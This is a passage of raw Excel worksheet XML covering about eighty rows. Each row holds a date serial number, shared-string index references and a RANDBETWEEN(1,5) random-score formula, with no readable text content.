        <v>4</v>
      </c>
    </row>
    <row r="14171" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14171" s="1">
        <v>43249.962002314816</v>
      </c>
      <c r="C14171" t="s">
        <v>144</v>
      </c>
      <c r="E14171" t="s">
        <v>12711</v>
      </c>
      <c r="F14171">
        <f t="shared" ca="1" si="221"/>
        <v>4</v>
      </c>
    </row>
    <row r="14172" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A14172" s="1">
        <v>43249.955127314817</v>
      </c>
      <c r="C14172" t="s">
        <v>845</v>
      </c>
      <c r="E14172" s="2" t="s">
        <v>12712</v>
      </c>
      <c r="F14172">
        <f t="shared" ca="1" si="221"/>
        <v>1</v>
      </c>
    </row>
    <row r="14173" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14173" s="1">
        <v>43249.878391203703</v>
      </c>
      <c r="C14173" t="s">
        <v>253</v>
      </c>
      <c r="F14173">
        <f t="shared" ca="1" si="221"/>
        <v>3</v>
      </c>
    </row>
    <row r="14174" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14174" s="1">
        <v>43249.877870370372</v>
      </c>
      <c r="C14174" t="s">
        <v>253</v>
      </c>
      <c r="E14174" t="s">
        <v>12713</v>
      </c>
      <c r="F14174">
        <f t="shared" ca="1" si="221"/>
        <v>5</v>
      </c>
    </row>
    <row r="14175" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14175" s="1">
        <v>43249.72111111111</v>
      </c>
      <c r="C14175" t="s">
        <v>10</v>
      </c>
      <c r="D14175" t="s">
        <v>6</v>
      </c>
      <c r="E14175" t="s">
        <v>12714</v>
      </c>
      <c r="F14175">
        <f t="shared" ca="1" si="221"/>
        <v>2</v>
      </c>
    </row>
    <row r="14176" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14176" s="1">
        <v>43249.713368055556</v>
      </c>
      <c r="C14176" t="s">
        <v>10</v>
      </c>
      <c r="D14176" t="s">
        <v>36</v>
      </c>
      <c r="E14176" t="s">
        <v>12715</v>
      </c>
      <c r="F14176">
        <f t="shared" ca="1" si="221"/>
        <v>3</v>
      </c>
    </row>
    <row r="14177" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A14177" s="1">
        <v>43249.700636574074</v>
      </c>
      <c r="C14177" t="s">
        <v>6</v>
      </c>
      <c r="D14177" t="s">
        <v>25</v>
      </c>
      <c r="E14177" s="2" t="s">
        <v>12716</v>
      </c>
      <c r="F14177">
        <f t="shared" ca="1" si="221"/>
        <v>1</v>
      </c>
    </row>
    <row r="14178" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A14178" s="1">
        <v>43249.683796296296</v>
      </c>
      <c r="C14178" t="s">
        <v>16</v>
      </c>
      <c r="E14178" s="2" t="s">
        <v>12717</v>
      </c>
      <c r="F14178">
        <f t="shared" ca="1" si="221"/>
        <v>3</v>
      </c>
    </row>
    <row r="14179" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14179" s="1">
        <v>43249.668067129627</v>
      </c>
      <c r="C14179" t="s">
        <v>10</v>
      </c>
      <c r="D14179" t="s">
        <v>6</v>
      </c>
      <c r="E14179" t="s">
        <v>12718</v>
      </c>
      <c r="F14179">
        <f t="shared" ca="1" si="221"/>
        <v>4</v>
      </c>
    </row>
    <row r="14180" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14180" s="1">
        <v>43249.621655092589</v>
      </c>
      <c r="C14180" t="s">
        <v>10</v>
      </c>
      <c r="D14180" t="s">
        <v>23</v>
      </c>
      <c r="E14180" t="s">
        <v>12719</v>
      </c>
      <c r="F14180">
        <f t="shared" ca="1" si="221"/>
        <v>4</v>
      </c>
    </row>
    <row r="14181" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A14181" s="1">
        <v>43249.614363425928</v>
      </c>
      <c r="C14181" t="s">
        <v>993</v>
      </c>
      <c r="D14181" t="s">
        <v>251</v>
      </c>
      <c r="E14181" s="2" t="s">
        <v>12720</v>
      </c>
      <c r="F14181">
        <f t="shared" ca="1" si="221"/>
        <v>5</v>
      </c>
    </row>
    <row r="14182" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A14182" s="1">
        <v>43249.604988425926</v>
      </c>
      <c r="C14182" t="s">
        <v>10</v>
      </c>
      <c r="D14182" t="s">
        <v>6</v>
      </c>
      <c r="E14182" s="2" t="s">
        <v>12721</v>
      </c>
      <c r="F14182">
        <f t="shared" ca="1" si="221"/>
        <v>1</v>
      </c>
    </row>
    <row r="14183" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14183" s="1">
        <v>43249.602337962962</v>
      </c>
      <c r="C14183" t="s">
        <v>10</v>
      </c>
      <c r="D14183" t="s">
        <v>36</v>
      </c>
      <c r="E14183" t="s">
        <v>12722</v>
      </c>
      <c r="F14183">
        <f t="shared" ca="1" si="221"/>
        <v>5</v>
      </c>
    </row>
    <row r="14184" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A14184" s="1">
        <v>43249.586018518516</v>
      </c>
      <c r="C14184" t="s">
        <v>10</v>
      </c>
      <c r="D14184" t="s">
        <v>20</v>
      </c>
      <c r="E14184" s="2" t="s">
        <v>12723</v>
      </c>
      <c r="F14184">
        <f t="shared" ca="1" si="221"/>
        <v>1</v>
      </c>
    </row>
    <row r="14185" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14185" s="1">
        <v>43249.556122685186</v>
      </c>
      <c r="C14185" t="s">
        <v>10</v>
      </c>
      <c r="D14185" t="s">
        <v>36</v>
      </c>
      <c r="E14185" t="s">
        <v>12724</v>
      </c>
      <c r="F14185">
        <f t="shared" ca="1" si="221"/>
        <v>1</v>
      </c>
    </row>
    <row r="14186" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14186" s="1">
        <v>43249.536921296298</v>
      </c>
      <c r="C14186" t="s">
        <v>16</v>
      </c>
      <c r="E14186" t="s">
        <v>12725</v>
      </c>
      <c r="F14186">
        <f t="shared" ca="1" si="221"/>
        <v>1</v>
      </c>
    </row>
    <row r="14187" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A14187" s="1">
        <v>43249.522453703707</v>
      </c>
      <c r="C14187" t="s">
        <v>65</v>
      </c>
      <c r="E14187" s="2" t="s">
        <v>12726</v>
      </c>
      <c r="F14187">
        <f t="shared" ca="1" si="221"/>
        <v>4</v>
      </c>
    </row>
    <row r="14188" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14188" s="1">
        <v>43249.500324074077</v>
      </c>
      <c r="C14188" t="s">
        <v>6</v>
      </c>
      <c r="D14188" t="s">
        <v>2139</v>
      </c>
      <c r="E14188" t="s">
        <v>12727</v>
      </c>
      <c r="F14188">
        <f t="shared" ca="1" si="221"/>
        <v>5</v>
      </c>
    </row>
    <row r="14189" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14189" s="1">
        <v>43249.498923611114</v>
      </c>
      <c r="C14189" t="s">
        <v>6</v>
      </c>
      <c r="D14189" t="s">
        <v>2139</v>
      </c>
      <c r="E14189" t="s">
        <v>12728</v>
      </c>
      <c r="F14189">
        <f t="shared" ca="1" si="221"/>
        <v>4</v>
      </c>
    </row>
    <row r="14190" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14190" s="1">
        <v>43249.490949074076</v>
      </c>
      <c r="C14190" t="s">
        <v>6</v>
      </c>
      <c r="D14190" t="s">
        <v>114</v>
      </c>
      <c r="E14190" t="s">
        <v>12729</v>
      </c>
      <c r="F14190">
        <f t="shared" ca="1" si="221"/>
        <v>4</v>
      </c>
    </row>
    <row r="14191" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A14191" s="1">
        <v>43249.480208333334</v>
      </c>
      <c r="C14191" t="s">
        <v>48</v>
      </c>
      <c r="E14191" s="2" t="s">
        <v>12730</v>
      </c>
      <c r="F14191">
        <f t="shared" ca="1" si="221"/>
        <v>5</v>
      </c>
    </row>
    <row r="14192" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14192" s="1">
        <v>43249.477627314816</v>
      </c>
      <c r="C14192" t="s">
        <v>10</v>
      </c>
      <c r="D14192" t="s">
        <v>6</v>
      </c>
      <c r="E14192" t="s">
        <v>12731</v>
      </c>
      <c r="F14192">
        <f t="shared" ca="1" si="221"/>
        <v>2</v>
      </c>
    </row>
    <row r="14193" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14193" s="1">
        <v>43249.453310185185</v>
      </c>
      <c r="C14193" t="s">
        <v>10</v>
      </c>
      <c r="D14193" t="s">
        <v>20</v>
      </c>
      <c r="E14193" t="s">
        <v>12732</v>
      </c>
      <c r="F14193">
        <f t="shared" ca="1" si="221"/>
        <v>5</v>
      </c>
    </row>
    <row r="14194" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14194" s="1">
        <v>43249.426782407405</v>
      </c>
      <c r="C14194" t="s">
        <v>10</v>
      </c>
      <c r="D14194" t="s">
        <v>178</v>
      </c>
      <c r="E14194" t="s">
        <v>12733</v>
      </c>
      <c r="F14194">
        <f t="shared" ca="1" si="221"/>
        <v>1</v>
      </c>
    </row>
    <row r="14195" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A14195" s="1">
        <v>43249.418807870374</v>
      </c>
      <c r="C14195" t="s">
        <v>65</v>
      </c>
      <c r="E14195" s="2" t="s">
        <v>12734</v>
      </c>
      <c r="F14195">
        <f t="shared" ca="1" si="221"/>
        <v>4</v>
      </c>
    </row>
    <row r="14196" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A14196" s="1">
        <v>43249.386435185188</v>
      </c>
      <c r="C14196" t="s">
        <v>559</v>
      </c>
      <c r="E14196" s="2" t="s">
        <v>12735</v>
      </c>
      <c r="F14196">
        <f t="shared" ca="1" si="221"/>
        <v>1</v>
      </c>
    </row>
    <row r="14197" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14197" s="1">
        <v>43249.379814814813</v>
      </c>
      <c r="C14197" t="s">
        <v>10</v>
      </c>
      <c r="D14197" t="s">
        <v>17</v>
      </c>
      <c r="E14197" t="s">
        <v>12736</v>
      </c>
      <c r="F14197">
        <f t="shared" ca="1" si="221"/>
        <v>4</v>
      </c>
    </row>
    <row r="14198" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14198" s="1">
        <v>43249.33902777778</v>
      </c>
      <c r="C14198" t="s">
        <v>43</v>
      </c>
      <c r="E14198" t="s">
        <v>12737</v>
      </c>
      <c r="F14198">
        <f t="shared" ca="1" si="221"/>
        <v>3</v>
      </c>
    </row>
    <row r="14199" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A14199" s="1">
        <v>43249.310972222222</v>
      </c>
      <c r="C14199" t="s">
        <v>103</v>
      </c>
      <c r="E14199" s="2" t="s">
        <v>12738</v>
      </c>
      <c r="F14199">
        <f t="shared" ca="1" si="221"/>
        <v>3</v>
      </c>
    </row>
    <row r="14200" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14200" s="1">
        <v>43249.293368055558</v>
      </c>
      <c r="C14200" t="s">
        <v>134</v>
      </c>
      <c r="E14200" t="s">
        <v>12739</v>
      </c>
      <c r="F14200">
        <f t="shared" ca="1" si="221"/>
        <v>4</v>
      </c>
    </row>
    <row r="14201" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14201" s="1">
        <v>43249.289918981478</v>
      </c>
      <c r="C14201" t="s">
        <v>41</v>
      </c>
      <c r="E14201" t="s">
        <v>12740</v>
      </c>
      <c r="F14201">
        <f t="shared" ca="1" si="221"/>
        <v>3</v>
      </c>
    </row>
    <row r="14202" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14202" s="1">
        <v>43249.289270833331</v>
      </c>
      <c r="C14202" t="s">
        <v>144</v>
      </c>
      <c r="E14202" t="s">
        <v>12741</v>
      </c>
      <c r="F14202">
        <f t="shared" ca="1" si="221"/>
        <v>3</v>
      </c>
    </row>
    <row r="14203" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14203" s="1">
        <v>43249.26226851852</v>
      </c>
      <c r="C14203" t="s">
        <v>65</v>
      </c>
      <c r="F14203">
        <f t="shared" ca="1" si="221"/>
        <v>2</v>
      </c>
    </row>
    <row r="14204" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A14204" s="1">
        <v>43249.259768518517</v>
      </c>
      <c r="C14204" t="s">
        <v>43</v>
      </c>
      <c r="E14204" s="2" t="s">
        <v>12742</v>
      </c>
      <c r="F14204">
        <f t="shared" ca="1" si="221"/>
        <v>2</v>
      </c>
    </row>
    <row r="14205" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A14205" s="1">
        <v>43249.257106481484</v>
      </c>
      <c r="C14205" t="s">
        <v>71</v>
      </c>
      <c r="E14205" s="2" t="s">
        <v>12743</v>
      </c>
      <c r="F14205">
        <f t="shared" ca="1" si="221"/>
        <v>5</v>
      </c>
    </row>
    <row r="14206" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A14206" s="1">
        <v>43249.240925925929</v>
      </c>
      <c r="C14206" t="s">
        <v>29</v>
      </c>
      <c r="D14206" t="s">
        <v>263</v>
      </c>
      <c r="E14206" s="2" t="s">
        <v>12744</v>
      </c>
      <c r="F14206">
        <f t="shared" ca="1" si="221"/>
        <v>1</v>
      </c>
    </row>
    <row r="14207" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14207" s="1">
        <v>43249.23537037037</v>
      </c>
      <c r="C14207" t="s">
        <v>461</v>
      </c>
      <c r="D14207" t="s">
        <v>14</v>
      </c>
      <c r="E14207" t="s">
        <v>12745</v>
      </c>
      <c r="F14207">
        <f t="shared" ca="1" si="221"/>
        <v>5</v>
      </c>
    </row>
    <row r="14208" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A14208" s="1">
        <v>43249.217094907406</v>
      </c>
      <c r="C14208" t="s">
        <v>48</v>
      </c>
      <c r="E14208" s="2" t="s">
        <v>12746</v>
      </c>
      <c r="F14208">
        <f t="shared" ca="1" si="221"/>
        <v>2</v>
      </c>
    </row>
    <row r="14209" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14209" s="1">
        <v>43249.16609953704</v>
      </c>
      <c r="C14209" t="s">
        <v>6</v>
      </c>
      <c r="D14209" t="s">
        <v>25</v>
      </c>
      <c r="E14209" t="s">
        <v>12747</v>
      </c>
      <c r="F14209">
        <f t="shared" ca="1" si="221"/>
        <v>4</v>
      </c>
    </row>
    <row r="14210" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A14210" s="1">
        <v>43249.149328703701</v>
      </c>
      <c r="C14210" t="s">
        <v>65</v>
      </c>
      <c r="E14210" s="2" t="s">
        <v>12748</v>
      </c>
      <c r="F14210">
        <f t="shared" ref="F14210:F14273" ca="1" si="222">RANDBETWEEN(1,5)</f>
        <v>1</v>
      </c>
    </row>
    <row r="14211" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14211" s="1">
        <v>43249.103275462963</v>
      </c>
      <c r="C14211" t="s">
        <v>41</v>
      </c>
      <c r="E14211" t="s">
        <v>12749</v>
      </c>
      <c r="F14211">
        <f t="shared" ca="1" si="222"/>
        <v>1</v>
      </c>
    </row>
    <row r="14212" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14212" s="1">
        <v>43249.096087962964</v>
      </c>
      <c r="C14212" t="s">
        <v>41</v>
      </c>
      <c r="E14212" t="s">
        <v>12750</v>
      </c>
      <c r="F14212">
        <f t="shared" ca="1" si="222"/>
        <v>2</v>
      </c>
    </row>
    <row r="14213" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A14213" s="1">
        <v>43249.011493055557</v>
      </c>
      <c r="C14213" t="s">
        <v>41</v>
      </c>
      <c r="E14213" s="2" t="s">
        <v>12751</v>
      </c>
      <c r="F14213">
        <f t="shared" ca="1" si="222"/>
        <v>5</v>
      </c>
    </row>
    <row r="14214" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A14214" s="1">
        <v>43248.995173611111</v>
      </c>
      <c r="C14214" t="s">
        <v>565</v>
      </c>
      <c r="D14214" t="s">
        <v>602</v>
      </c>
      <c r="E14214" s="2" t="s">
        <v>12752</v>
      </c>
      <c r="F14214">
        <f t="shared" ca="1" si="222"/>
        <v>4</v>
      </c>
    </row>
    <row r="14215" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14215" s="1">
        <v>43248.994062500002</v>
      </c>
      <c r="C14215" t="s">
        <v>454</v>
      </c>
      <c r="D14215" t="s">
        <v>11</v>
      </c>
      <c r="E14215" t="s">
        <v>12753</v>
      </c>
      <c r="F14215">
        <f t="shared" ca="1" si="222"/>
        <v>5</v>
      </c>
    </row>
    <row r="14216" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A14216" s="1">
        <v>43248.645636574074</v>
      </c>
      <c r="C14216" t="s">
        <v>292</v>
      </c>
      <c r="D14216" t="s">
        <v>290</v>
      </c>
      <c r="E14216" s="2" t="s">
        <v>12754</v>
      </c>
      <c r="F14216">
        <f t="shared" ca="1" si="222"/>
        <v>5</v>
      </c>
    </row>
    <row r="14217" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14217" s="1">
        <v>43248.614571759259</v>
      </c>
      <c r="C14217" t="s">
        <v>10</v>
      </c>
      <c r="D14217" t="s">
        <v>721</v>
      </c>
      <c r="E14217" t="s">
        <v>12755</v>
      </c>
      <c r="F14217">
        <f t="shared" ca="1" si="222"/>
        <v>3</v>
      </c>
    </row>
    <row r="14218" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14218" s="1">
        <v>43248.573229166665</v>
      </c>
      <c r="C14218" t="s">
        <v>6</v>
      </c>
      <c r="D14218" t="s">
        <v>25</v>
      </c>
      <c r="E14218" t="s">
        <v>12756</v>
      </c>
      <c r="F14218">
        <f t="shared" ca="1" si="222"/>
        <v>4</v>
      </c>
    </row>
    <row r="14219" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14219" s="1">
        <v>43248.530590277776</v>
      </c>
      <c r="C14219" t="s">
        <v>43</v>
      </c>
      <c r="E14219" t="s">
        <v>12757</v>
      </c>
      <c r="F14219">
        <f t="shared" ca="1" si="222"/>
        <v>1</v>
      </c>
    </row>
    <row r="14220" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14220" s="1">
        <v>43248.492592592593</v>
      </c>
      <c r="C14220" t="s">
        <v>10</v>
      </c>
      <c r="D14220" t="s">
        <v>36</v>
      </c>
      <c r="E14220" t="s">
        <v>12758</v>
      </c>
      <c r="F14220">
        <f t="shared" ca="1" si="222"/>
        <v>2</v>
      </c>
    </row>
    <row r="14221" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14221" s="1">
        <v>43248.483159722222</v>
      </c>
      <c r="C14221" t="s">
        <v>17</v>
      </c>
      <c r="E14221" t="s">
        <v>12759</v>
      </c>
      <c r="F14221">
        <f t="shared" ca="1" si="222"/>
        <v>2</v>
      </c>
    </row>
    <row r="14222" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14222" s="1">
        <v>43248.459027777775</v>
      </c>
      <c r="C14222" t="s">
        <v>6</v>
      </c>
      <c r="D14222" t="s">
        <v>25</v>
      </c>
      <c r="E14222" t="s">
        <v>12760</v>
      </c>
      <c r="F14222">
        <f t="shared" ca="1" si="222"/>
        <v>1</v>
      </c>
    </row>
    <row r="14223" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A14223" s="1">
        <v>43248.449386574073</v>
      </c>
      <c r="C14223" t="s">
        <v>6</v>
      </c>
      <c r="D14223" t="s">
        <v>194</v>
      </c>
      <c r="E14223" s="2" t="s">
        <v>12761</v>
      </c>
      <c r="F14223">
        <f t="shared" ca="1" si="222"/>
        <v>4</v>
      </c>
    </row>
    <row r="14224" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14224" s="1">
        <v>43248.426226851851</v>
      </c>
      <c r="C14224" t="s">
        <v>6</v>
      </c>
      <c r="D14224" t="s">
        <v>124</v>
      </c>
      <c r="E14224" t="s">
        <v>12762</v>
      </c>
      <c r="F14224">
        <f t="shared" ca="1" si="222"/>
        <v>5</v>
      </c>
    </row>
    <row r="14225" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14225" s="1">
        <v>43248.386597222219</v>
      </c>
      <c r="C14225" t="s">
        <v>65</v>
      </c>
      <c r="E14225" t="s">
        <v>12763</v>
      </c>
      <c r="F14225">
        <f t="shared" ca="1" si="222"/>
        <v>2</v>
      </c>
    </row>
    <row r="14226" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14226" s="1">
        <v>43248.3827662037</v>
      </c>
      <c r="C14226" t="s">
        <v>41</v>
      </c>
      <c r="E14226" t="s">
        <v>12764</v>
      </c>
      <c r="F14226">
        <f t="shared" ca="1" si="222"/>
        <v>2</v>
      </c>
    </row>
    <row r="14227" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A14227" s="1">
        <v>43248.379120370373</v>
      </c>
      <c r="C14227" t="s">
        <v>344</v>
      </c>
      <c r="E14227" s="2" t="s">
        <v>12765</v>
      </c>
      <c r="F14227">
        <f t="shared" ca="1" si="222"/>
        <v>5</v>
      </c>
    </row>
    <row r="14228" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A14228" s="1">
        <v>43248.375474537039</v>
      </c>
      <c r="C14228" t="s">
        <v>6</v>
      </c>
      <c r="D14228" t="s">
        <v>194</v>
      </c>
      <c r="E14228" s="2" t="s">
        <v>12766</v>
      </c>
      <c r="F14228">
        <f t="shared" ca="1" si="222"/>
        <v>3</v>
      </c>
    </row>
    <row r="14229" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A14229" s="1">
        <v>43248.307800925926</v>
      </c>
      <c r="C14229" t="s">
        <v>2210</v>
      </c>
      <c r="E14229" s="2" t="s">
        <v>12767</v>
      </c>
      <c r="F14229">
        <f t="shared" ca="1" si="222"/>
        <v>4</v>
      </c>
    </row>
    <row r="14230" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14230" s="1">
        <v>43248.253750000003</v>
      </c>
      <c r="C14230" t="s">
        <v>41</v>
      </c>
      <c r="E14230" t="s">
        <v>12768</v>
      </c>
      <c r="F14230">
        <f t="shared" ca="1" si="222"/>
        <v>1</v>
      </c>
    </row>
    <row r="14231" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14231" s="1">
        <v>43248.237233796295</v>
      </c>
      <c r="C14231" t="s">
        <v>60</v>
      </c>
      <c r="E14231" t="s">
        <v>12769</v>
      </c>
      <c r="F14231">
        <f t="shared" ca="1" si="222"/>
        <v>4</v>
      </c>
    </row>
    <row r="14232" spans="1:6" ht="375" x14ac:dyDescent="0.25">
      <c r="A14232" s="1">
        <v>43248.228263888886</v>
      </c>
      <c r="C14232" t="s">
        <v>63</v>
      </c>
      <c r="E14232" s="2" t="s">
        <v>12770</v>
      </c>
      <c r="F14232">
        <f t="shared" ca="1" si="222"/>
        <v>2</v>
      </c>
    </row>
    <row r="14233" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A14233" s="1">
        <v>43247.737997685188</v>
      </c>
      <c r="C14233" t="s">
        <v>140</v>
      </c>
      <c r="D14233" t="s">
        <v>112</v>
      </c>
      <c r="E14233" s="2" t="s">
        <v>12771</v>
      </c>
      <c r="F14233">
        <f t="shared" ca="1" si="222"/>
        <v>5</v>
      </c>
    </row>
    <row r="14234" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14234" s="1">
        <v>43247.727962962963</v>
      </c>
      <c r="C14234" t="s">
        <v>10</v>
      </c>
      <c r="D14234" t="s">
        <v>46</v>
      </c>
      <c r="E14234" t="s">
        <v>12772</v>
      </c>
      <c r="F14234">
        <f t="shared" ca="1" si="222"/>
        <v>1</v>
      </c>
    </row>
    <row r="14235" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14235" s="1">
        <v>43247.63</v>
      </c>
      <c r="C14235" t="s">
        <v>10</v>
      </c>
      <c r="D14235" t="s">
        <v>158</v>
      </c>
      <c r="E14235" t="s">
        <v>12773</v>
      </c>
      <c r="F14235">
        <f t="shared" ca="1" si="222"/>
        <v>1</v>
      </c>
    </row>
    <row r="14236" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A14236" s="1">
        <v>43247.552129629628</v>
      </c>
      <c r="C14236" t="s">
        <v>563</v>
      </c>
      <c r="E14236" s="2" t="s">
        <v>12774</v>
      </c>
      <c r="F14236">
        <f t="shared" ca="1" si="222"/>
        <v>5</v>
      </c>
    </row>
    <row r="14237" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14237" s="1">
        <v>43247.549988425926</v>
      </c>
      <c r="C14237" t="s">
        <v>41</v>
      </c>
      <c r="F14237">
        <f t="shared" ca="1" si="222"/>
        <v>5</v>
      </c>
    </row>
    <row r="14238" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A14238" s="1">
        <v>43247.352303240739</v>
      </c>
      <c r="C14238" t="s">
        <v>158</v>
      </c>
      <c r="D14238" t="s">
        <v>80</v>
      </c>
      <c r="E14238" s="2" t="s">
        <v>12775</v>
      </c>
      <c r="F14238">
        <f t="shared" ca="1" si="222"/>
        <v>3</v>
      </c>
    </row>
    <row r="14239" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A14239" s="1">
        <v>43247.314618055556</v>
      </c>
      <c r="C14239" t="s">
        <v>41</v>
      </c>
      <c r="E14239" s="2" t="s">
        <v>12776</v>
      </c>
      <c r="F14239">
        <f t="shared" ca="1" si="222"/>
        <v>2</v>
      </c>
    </row>
    <row r="14240" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14240" s="1">
        <v>43247.260474537034</v>
      </c>
      <c r="C14240" t="s">
        <v>166</v>
      </c>
      <c r="E14240" t="s">
        <v>12777</v>
      </c>
      <c r="F14240">
        <f t="shared" ca="1" si="222"/>
        <v>3</v>
      </c>
    </row>
    <row r="14241" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A14241" s="1">
        <v>43247.22693287037</v>
      </c>
      <c r="C14241" t="s">
        <v>140</v>
      </c>
      <c r="D14241" t="s">
        <v>56</v>
      </c>
      <c r="E14241" s="2" t="s">
        <v>12778</v>
      </c>
      <c r="F14241">
        <f t="shared" ca="1" si="222"/>
        <v>3</v>
      </c>
    </row>
    <row r="14242" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A14242" s="1">
        <v>43247.168136574073</v>
      </c>
      <c r="C14242" t="s">
        <v>140</v>
      </c>
      <c r="D14242" t="s">
        <v>86</v>
      </c>
      <c r="E14242" s="2" t="s">
        <v>12779</v>
      </c>
      <c r="F14242">
        <f t="shared" ca="1" si="222"/>
        <v>1</v>
      </c>
    </row>
    <row r="14243" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14243" s="1">
        <v>43247.024814814817</v>
      </c>
      <c r="C14243" t="s">
        <v>144</v>
      </c>
      <c r="E14243" t="s">
        <v>12780</v>
      </c>
      <c r="F14243">
        <f t="shared" ca="1" si="222"/>
        <v>1</v>
      </c>
    </row>
    <row r="14244" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A14244" s="1">
        <v>43246.798437500001</v>
      </c>
      <c r="C14244" t="s">
        <v>43</v>
      </c>
      <c r="D14244" t="s">
        <v>7</v>
      </c>
      <c r="E14244" s="2" t="s">
        <v>12781</v>
      </c>
      <c r="F14244">
        <f t="shared" ca="1" si="222"/>
        <v>2</v>
      </c>
    </row>
    <row r="14245" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14245" s="1">
        <v>43246.709745370368</v>
      </c>
      <c r="C14245" t="s">
        <v>471</v>
      </c>
      <c r="E14245" t="s">
        <v>12782</v>
      </c>
      <c r="F14245">
        <f t="shared" ca="1" si="222"/>
        <v>3</v>
      </c>
    </row>
    <row r="14246" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14246" s="1">
        <v>43246.498993055553</v>
      </c>
      <c r="C14246" t="s">
        <v>173</v>
      </c>
      <c r="E14246" t="s">
        <v>12783</v>
      </c>
      <c r="F14246">
        <f t="shared" ca="1" si="222"/>
        <v>4</v>
      </c>
    </row>
    <row r="14247" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14247" s="1">
        <v>43246.36755787037</v>
      </c>
      <c r="C14247" t="s">
        <v>41</v>
      </c>
      <c r="E14247" t="s">
        <v>12784</v>
      </c>
      <c r="F14247">
        <f t="shared" ca="1" si="222"/>
        <v>3</v>
      </c>
    </row>
    <row r="14248" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A14248" s="1">
        <v>43246.319722222222</v>
      </c>
      <c r="C14248" t="s">
        <v>2745</v>
      </c>
      <c r="D14248" t="s">
        <v>20</v>
      </c>
      <c r="E14248" s="2" t="s">
        <v>12785</v>
      </c>
      <c r="F14248">
        <f t="shared" ca="1" si="222"/>
        <v>2</v>
      </c>
    </row>
    <row r="14249" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A14249" s="1">
        <v>43246.248715277776</v>
      </c>
      <c r="C14249" t="s">
        <v>140</v>
      </c>
      <c r="D14249" t="s">
        <v>1160</v>
      </c>
      <c r="E14249" s="2" t="s">
        <v>12786</v>
      </c>
      <c r="F14249">
        <f t="shared" ca="1" si="222"/>
        <v>5</v>
      </c>
    </row>
    <row r="14250" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A14250" s="1">
        <v>43246.212002314816</v>
      </c>
      <c r="C14250" t="s">
        <v>454</v>
      </c>
      <c r="D14250" t="s">
        <v>20</v>
      </c>
